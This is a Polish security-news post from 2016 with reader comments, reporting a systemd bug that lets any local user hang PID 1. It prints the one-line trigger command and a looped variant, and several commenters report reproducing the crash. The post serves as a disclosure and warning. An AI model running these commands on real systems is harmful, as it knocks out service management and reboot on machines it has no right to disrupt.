Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

DoS na Linuksa jednym poleceniem z dowolnego użytkownika? – podatność w systemd

29 września 2016, 21:23 | W biegu | komentarzy 8
Tagi: ,

W lekkie panice załatano właśnie błąd w systemd, jeden z najistotniejszych składników wielu Linuksów, posiadający PID=1. Wg autora znaleziska, z dowolnego użytkownika wystarczy wpisać:

NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

system przestaje być stabilny, niektórzy raportują też problemy z rebootem:

After running this command, PID 1 is hung in the pause system call. You can no longer start and stop daemons. inetd-style services no longer accept connections. You cannot cleanly reboot the system. The system feels generally unstable (e.g. ssh and su hang for 30 seconds since systemd is now integrated with the login system).

Niektórzy też sugerują wykonanie całości w pętli:

Okay, I managed to trigger this on v229 by changing the PoC to the following:

while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify „”; done

Pamiętajcie żeby nie testować polecenia na systemach, których nie jesteście właścicielami.

Błąd występował od dwóch lat,  a fix był wyjątkowo prosty.

Całość błędu nie została niestety zgłoszona w trybie responsible disclosure, a analiza potencjalnych skutków (vs np. wykorzystywana wersja systemd) cały czas trwa. Dystrybucje jeszcze nie udostępniły patcha (ani komentarza).

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Nie odlaleziono polecenia 'systemd-notify’

    Odpowiedz
  2. skr

    apt-get install systemd-notify ^^

    Odpowiedz
    • Therminus

      W Slackware też to zadziała?

      Odpowiedz
  3. ~~

    O, systemd właśnie zaczął gryźć w d.pę. I dobrze. To g.no dawno powinno wylecieć z każdego normalnego uniksowego systemu.

    Odpowiedz
    • MoroS

      Prawda to… Na szczęście są jeszcze dystrybucje bez tego syfu. ;)

      Odpowiedz
  4. Seba

    W przypadku VirtualBoxa padają wszystkie maszyny aktualnie uruchomione, a sam VirtualBox przestaje odpowiadać.

    Odpowiedz
  5. Robert

    Testowałem na Ubuntu Server z następującym efektem:
    systemd się zatrzymuje, nie można resetować usług, bo resecie wszystko wraca do normy

    Odpowiedz
  6. Glivter

    Na archu działa ;)

    Odpowiedz

Odpowiedz